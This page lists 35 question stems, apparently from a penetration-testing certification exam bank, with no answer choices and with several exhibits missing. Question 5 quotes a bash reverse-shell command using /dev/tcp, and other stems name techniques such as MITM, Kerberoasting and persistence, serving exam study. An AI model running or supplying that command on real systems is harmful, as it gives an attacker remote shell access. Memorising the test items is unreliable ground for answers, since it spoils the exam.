MoreExam
1. Question Content...
EXPLANATION
Answer: X - EXPLANATION Content.
Question1: A penetration tester reports an application is only utilizing basic authentication on an Internet-facing application. Which of the following would be the BEST remediation strategy?
Question2: A client has requested an external network penetration test for compliance purposes. During discussion between the client and the penetration tester, the client expresses unwillingness to add the penetration tester's source IP addresses to the client's IPS whitelist for the duration of the test. Which of the following is the BEST argument as to why the penetration tester's source IP addresses should be whitelisted?
Question3: A penetration tester has performed a security assessment for a startup firm. The report lists a total of ten vulnerabilities, with five identified as critical. The client does not have the resources to immediately remediate all vulnerabilities. Under such circumstances, which of the following would be the BEST suggestion for the client?
Question4: A penetration tester is performing a remote scan to determine if the server farm is compliant with the company's software baseline. Which of the following should the penetration tester perform to verify compliance with the baseline?
Question5: The following line was found in an exploited machine's history file. An attacker ran the following command:bash -i >& /dev/tcp/192.168.0.1/80 0> &1Which of the following describes what the command does?
Question6: While trying to maintain persistence on a Windows system with limited privileges, which of the following registry keys should the tester use?
Question7: Which of the following commands starts the Metasploit database?
Question8: A malicious user wants to perform an MITM attack on a computer. The computer network configuration is given below:IP: 192.168.1.20NETMASK: 255.255.255.0DEFAULT GATEWAY: 192.168.1.254DHCP: 192.168.1.253DNS: 192.168.10.10, 192.168.20.10Which of the following commands should the malicious user execute to perform the MITM attack?
Question9: Which of the following tools is used to perform a credential brute force attack?
Question10: A penetration tester is reviewing the following output from a wireless sniffer:Which of the following can be extrapolated from the above information?
Question11: In which of the following scenarios would a tester perform a Kerberoasting attack?
Question12: A penetration tester compromises a system that has unrestricted network access over port 443 to any host. The penetration tester wants to create a reverse shell from the victim back to the attacker. Which of the following methods would the penetration tester MOST likely use?
Question13: A penetration tester wants to script out a way to discover all the RPTR records for a range of IP addresses.Which of the following is the MOST efficient to utilize?
Question14: Which of the following BEST describes some significant security weaknesses with an ICS, such as those used in electrical utility facilities, natural gas facilities, dams, and nuclear facilities?
Question15: A penetration tester is in the process of writing a report that outlines the overall level of risk to operations.In which of the following areas of the report should the penetration tester put this?
Question16: Which of the following properties of the penetration testing engagement agreement will have the LARGEST impact on observing and testing production systems at their highest loads?
Question17: After gaining initial low-privilege access to a Linux system, a penetration tester identifies an interesting binary in a user's home folder titled ''changepass."-sr-xr-x 1 root root 6443 Oct 18 2017 /home/user/changepassUsing "strings" to print ASCII printable characters from changepass, the tester notes the following:$ strings changepassexitsetuidstrcmpGLIBC_2.0ENV_PATH%s/changepwmallocstrlenGiven this information, which of the following is the MOST likely path of exploitation to achieve root privileges on the machine?
Question18: During a full-scope security assessment, which of the following is a prerequisite to social engineer a target by physically engaging them?
Question19: During testing, a critical vulnerability is discovered on a client's core server. Which of the following should be the NEXT action?
Question20: A security consultant is trying to attack a device with a previously identified user account.Which of the following types of attacks is being executed?
Question21: A penetration tester has compromised a Windows server and is attempting to achieve persistence. Which of the following would achieve that goal?
Question22: A penetration tester executes the following commands:Which of the following is a local host vulnerability that the attacker is exploiting?
Question23: A client has scheduled a wireless penetration test. Which of the following describes the scoping target information MOST likely needed before testing can begin?
Question24: A penetration tester reviews the scan results of a web application. Which of the following vulnerabilities is MOST critical and should be prioritized for exploitation?
Question25: A penetration tester is performing a code review. Which of the following testing techniques is being performed?
Question26: A security assessor is attempting to craft specialized XML files to test the security of the parsing functions during ingest into a Windows application. Before beginning to test the application, which of the following should the assessor request from the organization?
Question27: A penetration tester is performing ARP spoofing against a switch. Which of the following should the penetration tester spoof to get the MOST information?
Question28: A healthcare organization must abide by local regulations to protect and attest to the protection of personal health information of covered individuals. Which of the following conditions should a penetration tester specifically test for when performing an assessment? (Select TWO).
Question29: A penetration tester observes that the content security policy header is missing during a web application penetration test. Which of the following techniques would the penetration tester MOST likely perform?
Question30: An email sent from the Chief Executive Officer (CEO) to the Chief Financial Officer (CFO) states a wire transfer is needed to pay a new vendor. Neither is aware of the vendor, and the CEO denies ever sending the email. Which of the following types of motivation was used in this attack?
Question31: A penetration tester is testing a banking application and uncovers a vulnerability. The tester is logged in as a non-privileged user who should have no access to any data. Given the data below from the web interception proxy:Which of the following types of vulnerabilities is being exploited?
Question32: A security analyst was provided with a detailed penetration report, which was performed against the organization's DMZ environment. It was noted on the report that a finding has a CVSS base score of 10.0.Which of the following levels of difficulty would be required to exploit this vulnerability?
Question33: A security consultant receives a document outlining the scope of an upcoming penetration test. This document contains IP addresses and times that each can be scanned. Which of the following would contain this information?
Question34: An engineer, who is conducting a penetration test for a web application, discovers the user login process sends from field data using the HTTP GET method. To mitigate the risk of exposing sensitive information, the form should be sent using an:
Question35: A penetration tester observes that several high-numbered ports are listening on a public web server.However, the system owner says the application only uses port 443. Which of the following would be BEST to recommend?